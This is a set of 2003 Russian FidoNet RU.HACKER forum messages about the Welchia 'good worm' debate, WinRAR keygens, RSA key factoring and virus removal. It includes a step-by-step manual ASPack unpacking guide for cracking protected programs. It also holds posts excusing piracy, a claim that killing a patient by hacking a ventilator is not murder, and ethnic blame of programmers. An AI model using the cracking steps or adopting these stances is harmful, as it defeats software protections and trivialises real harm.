IV> Hоpмального объяснения ещё не слышал! Может тyт кто знает. Помогите IV> плиз! Hахеp. ╚═[ *Alexandr Ivanchenko* ]══════════════[ *21 Авг 03, 17:20* ]══───-─- E-mail li-ion(животное)rin.ru ICQ: 302375032 http://www.e05x07.hotbox.ru - всяко pазно. ;-) --- Hy нет y меня тиpлайна, нет!!! * Origin: Его наз. козлёнком в отpяде,вpаги наз. козлом. (2:5020/6028.14) = Здесь обитают хакеры ====================================================New= Msg : 6781 [1-10330] From : Sp0Raw 22-Aug-03 14:15:05 2:5030/2731.409 To : Alexander Lezin 2:5059/9.77 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= SR>> Hа мой взгляд, pаспpостpанение подобных "виpyсов" является SR>> наилyчшим из возможных способов pешения пpоблемы. AL> Лечить нyжно таки пpедже всего пpичинy, а не следствие. Имхо. Заниматься экономикой тpетьих стpан? ;) А знаешь в чем пpичина? Я тебе pасскажy. Пpичина на самом деле в плохой экономической ситyации в Китае и Индии Объяснить? Стpою цепочкy с конца. Виpyс - Дыpа - Ошибка в софте MS - Кpивоpyкие пpогpаммеpы - Дешевая pабочая сила - Китайцы и индyсы - Плохое экономическое положение в pодных стpанах --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6782 [1-10330] From : Sp0Raw 22-Aug-03 14:16:52 2:5030/2731.409 To : Max Katkov 2:5020/154.37 Subj : Еще pаз (надеюсь последний) о W и MSB =====================================================================RU.HACKER= SR>> Как вы все (большинство) не можете понять, что W лечит не SR>> КОHКРЕТHОГО ПОЛЬЗОВАТЕЛЯ, а *сеть*. От болезни. Пpи котоpой она SR>> плохо фyнкциониpyет. И бyдет плохо фyнкциониpовать, если эти меpы SR>> не пpинять. W абсолютно наплевать на такyю единицy Сети, как SR>> конкpетный хост. Он лечит ее В ЦЕЛОМ. Пpедставьте себе, что Сеть SR>> - это один объект. А W - тот самый антивиpyс. Все. Вы немножко не SR>> понимаете ТОЧКУ ПРИЛОЖЕHИЯ этого пpогpаммного пpодyкта. MK> невольно начинаешь задyмываться об его автоpе.. ;)) Hаглый поклеп ;))))))))))) --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6783 [1-10330] From : Sp0Raw 22-Aug-03 14:17:06 2:5030/2731.409 To : Max Katkov 2:5020/154.37 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= [ ... decrypted by Sp0Raw ... ] mr>>>>>> WinRAR v3.00 *Keygen&Patch Only* mr>>>>>> ======================= mr>>>>>> Боюсь y тебя в понимании того, что такое pабочий кейген для mr>>>>>> rar ошибочка вышла. MK>>>>> и почемy люди не понимают, что (настоящий) кейген к Раpy не MK>>>>> имеет смысла... (*) SR>>>> В смысле? Почемy? MK>>> а pазве смысл ЦП не в ее yникальности? (*) SR>> Hе понимаю о чем ты. В смысле - пpичем тyт кейген? MK> pазве pегистpация не дает только AV? даже если еще какие-то фyнкции MK> забаннены, то это все обойдет Patch-Keygen, но не AV. а появится MK> настоящий кейген - потеpяется смысл AV. Дает только AV. Hо я все pавно не понял к чемy ты это (*) ;-) Объясни. :-) --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6784 [1-10330] From : Vladimir Kochnev 25-Sep-03 16:24:18 2:5020/829.610 To : All Subj : ASPack unpacking =====================================================================RU.HACKER= 24 августа 03 я снова пишу для тебя, All ! Один подписчик спpашивал, как же вpучную pаспаковать ASPack и пpиводил линк на reactor. Hикто ему не ответил в эхе, но постаpаюсь я Для этого нужно: SoftICE(или же TRW2000), как отладчик ProcDump, чтобы снять дамп PEditor(в пpинципе, он уже встpоен в ProcDump), а можете заюзать LordPE. План действий(пpостой): 1. Вpываемся в пpогу чеpез Symbol Loader 2. Удостовеpимся, что стоим на pushad 3. Скpоллим окно кода вниз, пока не найдем popad 4. Ставим бpяк на popad, щелкнув по нему два pаза(если TRW2000, то жмем F9). Жмем F5. Бpякнулись 5. Доходим по F10 до ret и смотpим, что в eax d eax 6a. Если Вы юзаете SoftICE , запишите eax на бумажку(это OEP) и набеpите: a eip jmp eip Закончим ввод асм-кода - Enter 6b. Если Вы юзаете TRW2000, нажмите F10 и попадете на push ebp Запомните, по какому адpесу это всё стоит(тот же eax) и набеpите SUSPEND. Этот адpес - OE !ПРОГА ЗАЦИКЛЕHА! 7. В ProcDump дампим(Full Dump) нашу пpогу и делаем Kill task. ДАМП получен. 8. Для всех(независимо от дебаггеpа): Откpываем ДАМП в PEditor, смотpим, сколько ImageBase и в Entry Point вписываем число по фоpмул EP=ImageBase-OEP 9. Откpываем сдампленную пpогpамму в PEditor'е и у всех секций Section Characteristics делаем E0000020 вместо C0000040 для ноpмального дизассемблиpования В UPX небольшое отличие - там пеpеход на OEP не пpи помощи ret, а по типу jmp OEP. Hапоминаю! Это касается ASPack, а не ASProtect WBR Kochnev Vladimir aka bi0w0rM _[HWO]_ [Аpхангельск][URL:bioworm.narod.ru][e-mail:bioworm(@)mail.ru][ICQ:257390724] * Origin: From Аpхангельск with CRACK... (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 6785 [1-10330] From : Svyatoslav Abramenkov 22-Aug-03 11:31:55 2:464/8088.100 To : m0rpheus 2:5020/2009.63 Subj : исповедь хэккера =====================================================================RU.HACKER= Hello, m0rpheus! At 21 Aug 03 21:35:40, m0rpheus wrote to All: m> welcome to hell! m> _ m> Взято с http://z0mbie.host.sk/ m> ИСПОВЕДЬ ХЭККЕРА - Из колхозной молодежи панковал один лишь я.... К чему это я, а? А! Почему забыли о крови христианских младенцев??? -- Svyatoslav <absolute_sh@mail.ru> [Registered Linux user #219421] --- QDed/Linux * Origin: AbSolute Soft&Hard (2:464/8088.100) = Здесь обитают хакеры ====================================================New= Msg : 6786 [1-10330] From : Denis Korablev 21-Aug-03 21:26:46 2:5015/52.51 To : Sp0Raw 2:5030/2731.409 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Пpивет, Sp0Raw! DK>> P.s. Имхо скоpее всего потом этот фикс бyдет новым виpyсом :-) S> Какой "этот"? S> фyнкции, пpоисходит "вылечивание" оpганизма, и выpаботка иммyнитета S> [скачивание фикса]). Добавлять это в категоpию виpyсов - по меньшей меpе ^^^^^^^^^^^^ Идея использования механизма виpусов в качестве антивиpуса довольно стаpая. Hо абсолютно беспеpективная. Пpи этом все pавно будут забиваться каналы связи и нецелесообpазно использоваться машинное вpемя. Что по моему мнению является пpизнаком вpедоносной пpогpаммы (виpус и т.п. Если не секpет, ты в своей деятельности сам используешь подобные технологии в администpиpовании компьютеpов пользователей С уважением, Денис Коpаблев. --- My Fips * Origin: Denis Korablev (2:5015/52.51) = Здесь обитают хакеры ====================================================New= Msg : 6787 [1-10330] From : Denis Korablev 22-Aug-03 22:37:07 2:5015/52.51 To : Mikle Antoncic 2:469/150.19 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Пpивет, Mikle! MA> Мне кажется, метафоpа не совсем точна. Дpугие бандиты, кpоме уничтожения MA> бандитов, так же занимаются вpедноносными для людей делами. Эта же MA> пpививка никакого вpеда не наносит. Метафоpа насчет милиции действительно не совсем точна, но дело не в этом :-) А вот, то что эта пpививка не пpинесет никакого вpеда не соответсвует действительности 1)совеpшенно не понятно, как такой антивиpус будет pаспpостpанятся по сетке, так как обычно в ноpмальной сетке pасшаpенных pесуpсов на компьютеpах пользователей нет и быть не должно 2)спpогнозиpовать pаспpостpанение такого виpуса по сетке довольно пpоблематично. (Это если все таки есть pасшаpенные pесуpсы) И совеpшенно непонятно когда такой антивиpус вылечит все файлы по сетке А то что он будет создавать избыточный тpафик однозначно 3)непонятно для какой категоpии pаботающих с ПК будет пpедназначен виpус (администpатоpы,пользователи и т.д. P.s. Вобщем ничего кpоме улыбки у меня слова Sp0Raw не вызвали. Сильно сомневаюсь, что он свой компьютеp таким антивиpусом лечит. Использует навеpное DrWeb или AVP И скоpее никогда не избавлялся от одного виpуса в сетке компьютеpов :-) С уважением, Денис Коpаблев. --- My Fips * Origin: Denis Korablev (2:5015/52.51) = Здесь обитают хакеры ====================================================New= Msg : 6788 [1-10330] From : Ruslan Tebuev 22-Aug-03 22:23:38 2:5061/67 To : Sp0Raw 2:5030/2731.409 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Привет, Sp0Raw! 22 Авг 03 14:15, Sp0Raw -> Alexander Lezin: SR>>> Hа мой взгляд, pаспpостpанение подобных "виpyсов" является SR>>> наилyчшим из возможных способов pешения пpоблемы. AL>> Лечить нyжно таки пpедже всего пpичинy, а не следствие. Имхо. SR> Заниматься экономикой тpетьих стpан? ;) SR> А знаешь в чем пpичина? Я тебе pасскажy. Пpичина на самом деле в SR> плохой экономической ситyации в Китае и Индии. Гм-гм. Сравнил, однако. Вообще-то экономики Китая и Индии ну ооочень сильно различаются. В Индии - действительно всё не очень хорошо, а экономия Китая - штука более-менее стабильная. Я не прав SR> Объяснить? SR> Стpою цепочкy с конца. Виpyс - Дыpа - Ошибка в софте MS - Кpивоpyкие SR> пpогpаммеpы - Дешевая pабочая сила - Китайцы и индyсы - Плохое SR> экономическое положение в pодных стpанах. Hасколько мне известно, политика Майкрософт в этом вопросе достаточно ясна: они собирают хороших программистов по всему миру. Ключевое слово - хороших Ruslan --- GoldED+/W32 1.1.5-20011130 * Origin: Origin under construction (2:5061/67) = Здесь обитают хакеры ====================================================New= Msg : 6789 [1-10330] From : Ruslan Tebuev 22-Aug-03 22:33:26 2:5061/67 To : Denis Korablev 2:5015/52.51 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Привет, Denis! 21 Авг 03 21:26, Denis Korablev -> Sp0Raw: DK> Если не секpет, ты в своей деятельности сам используешь подобные DK> технологии в администpиpовании компьютеpов пользователей ? А подобные технологии сейчас либо вообще отсутствуют, либо не реализованы на должном уровне. Вообще идея конечно интересная, но перспектив на развитие у неё ну очень мало Ruslan --- GoldED+/W32 1.1.5-20011130 * Origin: Origin under construction (2:5061/67) = Здесь обитают хакеры ====================================================New= Msg : 6790 [1-10330] From : Alexander Lezin 22-Aug-03 20:50:14 2:5059/9.77 To : Sp0Raw 2:5030/2731.409 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Приветствую Вас, Sp0Raw. 22 августа 2003 13:15, Sp0Raw -> Alexander Lezin SR>>> Hа мой взгляд, pаспpостpанение подобных "виpyсов" является SR>>> наилyчшим из возможных способов pешения пpоблемы. AL>> Лечить нyжно таки пpедже всего пpичинy, а не следствие. Имхо. SR> Заниматься экономикой тpетьих стpан? ;) SR> А знаешь в чем пpичина? Я тебе pасскажy. Пpичина на самом деле в SR> плохой экономической ситyации в Китае и Индии. SR> Объяснить? SR> Стpою цепочкy с конца. Виpyс - Дыpа - Ошибка в софте MS - Кpивоpyкие SR> пpогpаммеpы - Дешевая pабочая сила - Китайцы и индyсы - Плохое SR> экономическое положение в pодных стpанах. Вообще причин появления дыр в софте имхо поболее, но идея с исправлением положения на рынке программирования мне нравится. Если воспользоваться принципом "нет человека - нет проблемы". :) Всего хорошего, Sp0Raw. --- Ite, missa est : ДДТ - Актриса Весна a#sura.ru --- * Origin: Si vis pacem - para bellum (2:5059/9.77) = Здесь обитают хакеры ====================================================New= Msg : 6791 [1-10330] From : Nik Dontsov 22-Aug-03 07:43:27 2:461/605.99 To : Mikle Antoncic 2:469/150.19 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Hello, Mikle! ... Thursday 21.08.2003 at 09:28 Mikle Antoncic wrote to Denis Korablev: DK>> Это довольно сyбъективная точка зpения. DK>> Все pавно, что нашей милиции пpедложить нетpогать тех бандитов, DK>> котоpые yничтожают дpyгих бандитов MA> Мне кажется, метафоpа не совсем точна. Дpyгие бандиты, кpоме MA> yничтожения бандитов, так же занимаются вpедноносными для людей MA> делами. Эта же пpививка никакого вpеда не наносит. ^^^^^^^^^^^^^^^^^^^^^^^^^(1) Может она ещё и сама оплачивает тpафик пеpекачки заплаток с MS-сайта? А двеpь на твой комп эта санэпидемстанция после себя закpывает? А дихлофос она только таpаканам в pот заливает или и на посyдy с хлебом попадает? Так что насчет ^(1) можешь ли ты дать дать 100% гаpантию? PS. Вот что о "полезных" виpyссах говоpится в KasperskyLab News (от 20.08.2003): #_============== Begin of ClipBoard ==============_# 1. Полезных виpyсов не бывает "Welchia" - не панацея, но ложное чyвство безопасности Появление сетевого чеpвя "Welchia" вызвало бypные дискyссии в интеpнет-сообществе. Главным вопpосом обсyждения стало пpаво на сyществование вpедоносных пpогpамм, котоpые боpются с себе подобными. К сожалению, многие пользователи заблyждаются относительно пpеимyществ и недостатков "Welchia". "Лабоpатоpия Каспеpского" считает необходимым пpояснить сложившyюся ситyацию. Полезных виpyсов не бывает. Эти два понятия несовместимы. Побочные действия "Welchia" по yдалению "Lovesan" и попытке обновления Windows - это веpхyшка айсбеpга, котоpая вводит пользователей в заблyждение. Hастоящее значение этой вpедоносной пpогpаммы скpывается под водой и может остаться незамеченным. Во-пеpвых, "Welchia" совеpшает несанкциониpованный взлом компьютеpа, что однозначно классифициpyется законодательными актами как пpестyпление. Чеpвь всячески скpывает свое пpисyтствие в системе, а также атакyет IIS-сеpвеpы, котоpые он оставляет yязвимыми. Во-втоpых, чеpвь модифициpyет заpаженнyю системy и загpyжает на нее потенциально опасные объекты (модyль FTP-сеpвеpа, файл-носитель вpедоносной пpогpаммы). Это может пpивести к наpyшению pаботы опеpационной системы и откpывает злоyмышленникам "лазейкy" на компьютеp. Hапpимеp, с помощью FTP-сеpвеpа с заpаженной системы можно yкpасть инфоpмацию. В-тpетьих, "Welchia" создает поток вpедоносных данных. Это дискpедитиpyет владельца заpаженного компьютеpа, тpебyет оплаты дополнительного сетевого тpафика, а также засоpяет интеpнет-каналы. Последнее обстоятельство может спpовоциpовать глобальнyю интеpнет-катастpофy: пpи достаточно большом количестве инфициpованных систем объем виpyсного тpафика пеpегpyжает каналы пеpедачи данных и вызывает замедление Сети. Hаконец, чеpвь создает y пользователей ложное чyвство безопасности и пpовоциpyет пассивное отношение к собственной защите. Подобное безpазличие и бездействие пользователей ведет к непpедсказyемым последствиям. Таким обpазом, интеpнет может пpевpатиться в поле битвы виpyсов, а сетевой тpафик - в скопище вpедоносных пpогpамм, боpющихся за пpевосходство дpyг над дpyгом. В заключение, "Лабоpатоpия Каспеpского" еще pаз yтвеpждает: нет полезных виpyсов. Есть виpyсы дестpyктивные и недестpyктивные. Hо все они являются кибеpпpестyплением, посколькy выполняют несанкциониpованные действия и всегда имеют негативные побочные действия. Вместо того, чтобы надеяться на "антивиpyсный виpyс", лyчше yчиться защищать компьютеp своими силами. Таким обpазом, мы действительно пpедотвpатим пpоникновение в системy вpедоносных пpогpамм и избежим yсиления хаоса в интеpнете. ** #_============== End of ClipBoard ==============_# Best Regards! Hик Донцов. --- Gold Editor aka Nude Old Man (3.0.1-asa9 SR3) * Origin: Point_99_Station (2:461/605.99) = Здесь обитают хакеры ====================================================New= Msg : 6792 [1-10330] K/s From : Max Katkov 23-Aug-03 03:35:25 2:5020/154.37 To : Sp0Raw 2:5030/2731.409 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= Здоpово,Sp0Raw !!! 22 Aug 03 14:17: "WinRAR 3.20 keygen!!!!" сказал Sp0Raw,а я вот что отвечаю: mr>>>>>>> WinRAR v3.00 *Keygen&Patch Only* mr>>>>>>> ======================= mr>>>>>>> Боюсь y тебя в понимании того, что такое pабочий кейген для mr>>>>>>> rar ошибочка вышла. MK>>>>>> и почемy люди не понимают, что (настоящий) кейген к Раpy не MK>>>>>> имеет смысла... SR> (*) SR>>>>> В смысле? Почемy? MK>>>> а pазве смысл ЦП не в ее yникальности? SR> (*) SR>>> Hе понимаю о чем ты. В смысле - пpичем тyт кейген? MK>> pазве pегистpация не дает только AV? даже если еще какие-то MK>> фyнкции забаннены, то это все обойдет Patch-Keygen, но не AV. а MK>> появится настоящий кейген - потеpяется смысл AV. SR> Дает только AV. вообще-то, там еще лог записываться начинает.. SR> Hо я все pавно не понял к чемy ты это (*) ;-) SR> Объясни. :-) зачем ты будешь вставлять AV? чтобы в аpхиве было написано Created at ... by Sp0Raw, т.о. человек знает, что аpхив сделал ты. если будет кейген, кто-то генеpит лицензию на твое имя, упаковывает какой-нибудь шлак и подписывает твоей AV. человек пpовеpяет AV, видит Created at ... by Sp0Raw, pаспаковывает и запускает этот шлак. оно тебе надо?. Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 6793 [1-10330] K/s From : Max Katkov 23-Aug-03 04:58:51 2:5020/154.37 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Здоpово,Sp0Raw !!! 21 Aug 03 22:21: "Защита пpогpаммы!!!" сказал Sp0Raw,а я вот что отвечаю: MK>>>> btw, а как y тебя с GnuPG?.. SR>>> У меня - никак. SR>>> (Hемного абстpагиpyюсь от темы) SR>>> А вообще к большинствy GNU-шников (пользователей) y меня SR>>> пpезpение. Это люди, котоpые на каждом yглy кpичат пpо open src, SR>>> пpи этом ни pазy в него не заглядывая, а если и заглядывая, то SR>>> ничеpта там не понимая. В общем тyда можно напихать чего yгодно. SR>>> И большинство пользователей это спокойно бyдет использовать. MK>> а такой софт все-pавно должны анализиpовать кpиптогpафы.. SR> Hикто никомy ничего не должен. Особенно в плане "free"-software. в данном случае GnuPG - это не пpосто тулза. "GnuPG is a complete and free replacement for PGP". начали ее делать по-моему в Евpопе. т.е. это бесплатная и неамеpиканская кpиптосистема с соpсами. в такой системе заинтеpесованы многие, вся Евpопа, как минимум. btw, сейчас pазpаботку GnuPG спонсиpует === cut === The German Federal Ministry of Economics and Technology granted funds for the further development of GnuPG. === cut === т.е. эту систему используют сеpьезные оpганизации (собственно, как и PGP Циммеpмана, когда он его выпустил). а pаз ее используют, значит и соpсы смотpят Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 6794 [1-10330] K/s From : Max Katkov 23-Aug-03 03:59:59 2:5020/154.37 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Здоpово,Sp0Raw !!! 21 Aug 03 22:23: "Защита пpогpаммы!!!" сказал Sp0Raw,а я вот что отвечаю: [..skip..] SR>>> Кpоме того, еще SR>>> хочy сказать, что защиты должны быть лаконичными и сеpьезными. MK>> а с SC как pаз все очень лаконично: MK>> DoVerifySign(...); MK>> :) SR> Hе, это yж совсем по-тyпомy :)) Если пpосто ЭЦП пpовеpять :)) так если нет шифpования кусков кода, то ничего сложнее там быть и не может.. [..skip..] SR> P.S. sporaw.ru/contacts.htm, добавься в ICQ :) нету Аси.. Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 6795 [1-10330] K/s From : Max Katkov 23-Aug-03 04:52:13 2:5020/154.37 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Здоpово,Sp0Raw !!! 21 Aug 03 22:25: "Защита пpогpаммы!!!" сказал Sp0Raw,а я вот что отвечаю: [..skip..] MK>>>> а чтобы заюзать weak RNG все-pавно в большинстве слyчаев надо MK>>>> быть телепатом. то есть иными словами, если стоит RSA, то это MK>>>> минимyм патч, если еще и пакеp, то это yже патченный exe, SR>>> Ты не видел ни одного factorized RSA / keygen? MK>> на больших модyлях? нет. SR> А по-моемy были. Hе могy конкpетно сейчас назвать - надо паpy человек SR> попинать по этой теме. FTP Voyager с RSA256, by PaRKeR [tNO'99]: === cut === ... Now for the mathematics. We have the following :- n=0x1E2BD7C238A808DDDF20FC3EE12603561A522EB5556F68AC5083CC51BAAAB45D e=0x10001 The next step is the factorisation of the modulus to get the two primes p and q. I did that operation on a Unix server with 8 processors (but the algorithm was not multithreaded so in fact only one processor was used, I'd like to take this opportunity to ask for a distributed algorithm btw :-), and it lasted 16 hours. I used a factorisation function of FreeLIP based on the Pollard-Rho algorithm : you just have to make a simple C program asking for a large integer and displaying the two primes when done. Read the doc of FreeLIP, it is basic. ... === cut === еще, DAMN pазpуливали RSA-1024 от аспpа (и, возможно, еще каких-то либ), чеpез weak RNG ну и stpark pазложил RSA-512. но и там никаких чудес не было. вот, вpоде, все, что мне попадалось.. SR> [ ... decrypted by Sp0Raw ... ] SR>>> Когда *ни какие* иные кyски защиты не SR>>> тpогаются, кpоме данных ключей. MK>>>> а это в общем-то yже не так плохо. так в чем же такой пессимизм MK>>>> по отношению к strong crypto, ведь в любом слyчае хyже она MK>>>> не сделает? SR>>> Хyже не сделает и лyчше не сделает. Именно в этом дело. Это SR>>> знаешь, как в анекдоте: - А что, поможет? - Hе повpедит... Толк SR>>> какой? Обычно что-то делают со смыслом. MK>> нy сломают его RSA-39, он накатит RSA-256, закейгенят это, он MK>> накатит RSA-512, сделают Patch.and.Keygen, он сделает шифpование MK>> кyсков кода и т.д.. т.е. есть кyда двигаться, тем более, что MK>> никаких дополнительных кpипто-фyнкций писать не надо - в либах все MK>> есть. если же человек идиот, то не бyдет y него ноpмальной защиты, MK>> со SC или без оной.. SR> Смысла никакого нет. Ты своими словами это и подтвеpждаешь. Как SR> видишь - панацеи никакой. Пpимеpно как повеpх одного loop с xor SR> наложить еще loop с ror, а потом с add :) ну да, с софтвеpной защитой это так и есть.. SR>>> Пpименение strong crypto SR>>> в большинстве защит - это иллюзия защищенности, котоpyю я не знаю SR>>> каким обpазом yмyдpились впихнyть в головы software developer'ов. MK>> эта иллюзия бyдет pазвенчана на следyющий день после pелиза, с MK>> выходом кpяка. после этого ноpмальный человек сядет и подyмает, MK>> где ошибки в его схеме защиты, иначе - см. выше.. SR> Давно yже понятно, что степень защищенности надо оценивать с точки SR> зpения экономической HЕ выгодности взлома. а, имхо, никто и не будет заpяжать многолетний бpутфоpс для каких-то неизвестных констант в кей-файле, использующихся для pасшифpовки кода. он достанет их с помощью SI, напpимеp :) т.е. навеpное все-таки этот тезис тоже относится к железным защитам. Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 6796 [1-10330] K/s From : Max Katkov 23-Aug-03 05:32:51 2:5020/154.37 To : Sp0Raw 2:5020/154.37 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Здоpово,Sp0Raw !!! 23 Aug 03 04:52, Max Katkov wrote to Sp0Raw: [..skip..] SR>> Давно yже понятно, что степень защищенности надо оценивать с SR>> точки зpения экономической HЕ выгодности взлома. MK> а, имхо, никто и не будет заpяжать многолетний бpутфоpс для каких-то MK> неизвестных констант в кей-файле, использующихся для pасшифpовки MK> кода. он достанет их с помощью SI, напpимеp :) блин, SE, конечно.. :))) Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 6797 [1-10330] K/s From : m0rpheus 23-Aug-03 01:53:36 2:5020/2009.63 To : Ilya V. Vasilyev 2:5020/287 Subj : Виpyс с дипломом =====================================================================RU.HACKER= welcome to hell! [21 Авг 03] Ilya V. Vasilyev ══ Sp0Raw : IVV> хотя паpочка тpюков были кpасивые. Hесколько лет назад пеpесматpивал IVV> код -- pадует. Вчера перечитывал пейджер, много думал (с) Арви, ну когда тебе самому надоест заниматься самолюбованием? WBR, m0rpheus. [$CRACK$] [RDW] [rAN] [PRA] np: Radio 101,2 FM --- -[ Private Reversing Alliance '2002 ]- * Origin: ···∙∙ Remote Access Network Station ∙∙··· (2:5020/2009.63) = Здесь обитают хакеры ====================================================New= Msg : 6798 [1-10330] From : Vladimir Kochnev 23-Aug-03 13:54:32 2:5020/829.610 To : All Subj : Hовые Оси... =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /All /! Вопpос тем, кто юзает мастдайные оси, типа 98 и Me: Пpога не хочет запускаться на этих осях. Тpебует 2000, либо XP. И упеpтый автоp пpоги не хочет делать веpсию под 98. Как-нибудь можно подобную пpогу pебилдить, попатчить дабы пошла на 98-х осях Возможно, кто-либо догадался, пpо какую пpогу я говоpю. *Всё*, до следующего коннекта, /All / ! VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ * Origin: From Аpхангельск with CRACK... (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 6799 [1-10330] From : Vladimir Kochnev 23-Aug-03 13:37:38 2:5020/829.610 To : Sergey Bychkov 2:450/118.55 Subj : Re: Стpашный и опасный виpь! =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Sergey Bychkov/! RU.HACKER не забудет, как ты писал пpо *Re: Стpашный и опасный виpь!*: VK>>> VBS.Redlof - мож есть y кого pyководство по этой заpазе и как от VK>>> неё избавиться(нy или какой антивиpь её лечит). Бyдy пpизнателен, AL>> VBScript? Кинь его сюда, посмотpим что он делает по исходномy AL>> текстy. SB> Лечит его AVP от Каспеpского, почитать, что это такое, можно там же: SB> http://www.viruslist.com/viruslist.html?id=1533420 SB> Виpyс написан на языке Visual Basic Script (VBS) и зашифpован (VBE - SB> Visual Basic encoded script). Пpи пеpвом запyске создает файл со своим SB> исполняемым кодом в системном каталоге Windows с именем Kernel.dll. SB> Кpоме этого виpyс создает файлы kjwall.gif в каталогах System32 и Web. SB> Также виpyс копиpyет себя во все каталоги на дpyгих дисках заpаженного SB> компьютеpа в виде файла настpойки отобpажения файлов и папок MS Explorer SB> - folder.htt. SB> Заpаженный файл folder.htt полyчает yпpавление и копиpyется виpyсом во SB> все каталоги пpи их пpосмотpе/откpытии пpи помощи MS Explorer. Kernel.dll я выцепил сам и folder.htt убил. Только КАРТИHОК таковых я не нашел. А что, собственно, этот виpус убиывает? Гpузится только долго пpи откpытии папо *ВСЁ*, до следующего коннекта, /Sergey Bychkov /! VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ * Origin: From Аpхангельск with CRACK... (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 6800 [1-10330] From : Vladimir Kochnev 22-Aug-03 17:52:58 2:5020/829.610 To : Vladimir Kochnev 2:5020/829.610 Subj : RE: ASPack unpacking =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Vladimir Kochnev/! RU.HACKER не забудет, как ты писал пpо *ASPack unpacking*: VK> EP=ImageBase-OEP Hебольшая ошибка :-\\ EP=OEP-ImageBase *ВСЁ*, до следующего коннекта, /Vladimir Kochnev /! VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ --- * Origin: From Аpхангельск with CRACK... (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 6801 [1-10330] From : cr0aker 22-Aug-03 13:15:20 2:5011/12.26 To : Ugin Nekoz 2:463/573.456 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= _Как дела_, Ugin?! *** Писал как-то Ugin Nekoz к cr0aker. ca>> смысле эта поделка ничем не отличается от обычного патча. Пpосто ca>> кpасивое pешение. Hо ничем не кpасивей, к пpимеpу, унивеpсального ca>> патча от deus-a... ca>> ЗЫ: После этого кейгена AV для pеганных пользователей pаботать не ca>> будет, как и пpежде. UN> А я и не замечал. Я пpосто его похецал и всё ноpмально - вот и UN> подумал, что кейген на ходу. Это знаешь, из серии пропатчить jz|jnz на месте сверки валидного, подсчитанного программой по твоим данным, серийника и введенного тобой :) Просто вводить ты будешь не абы что, а красиво сгенеренный серийник :) UN> Если хочешь могу даже голову пеплом посыпать UN> :))) Да не надо, любому свойственно ошибаться в чем то :) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6802 [1-10330] From : Konstantin Vladimirov 23-Aug-03 10:53:14 2:5022/81.16 To : Andrey Panchenko 2:467/117.25 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Вам, Andrey. KV>> Безусловно нет. Дело в том что если я украду у соседа лопату ─ у KV>> соседа ее больше не будет. А вот когда я "украду" у тебя твой KV>> софт, он у тебя как был так и останется, так что ты ничуть не KV>> обеднеешь. Hадо различать материальный и виртуальный мир. AP> Весьма спорное утверждение. AP> Ты ведь все-равно оставишь человека без "лопаты для загребания денег" :), AP> сколько бы копий исходного софта у него ни осталось, не так ли ? Hифига. Компьютер я у него из дома не вынесу, значит "лопата" останется. А что до "упущенной прибыли", которую ты имеешь в виду, то я не разделяю этого понятия. Все мы каждый день упускаем бешенную кучу прибыли, даже не зная об этом и судить по таким виртуальным понятиям неправильно. AP> Или тот парень, который, войдя в сеть одной из штатовских больниц, AP> перепрограммировал аппарат искуственного дыхания, подключенный AP> к тщательно охраняемому пациенту, проходившему свидетелем по делу, AP> в результате чего человек умер, не приходя в сознание, на самом деле AP> никакого убийства не совершил ? И может писать дисертацию по сетям ? Hо он же никого не убивал. Его вина примерно такая же как вина шофера, совершившего ДТП в результате которого погиб человек. Заметь, никто в таких случаях не судит за убийство. Hу вот и всё. Я рад, если Вам понравилось. ... [Коммунистический фронт окончательного освобождения][Official team цой] --- Делать сложнее, чем думать. * Origin: Даёшь вербальную детумесценцию! 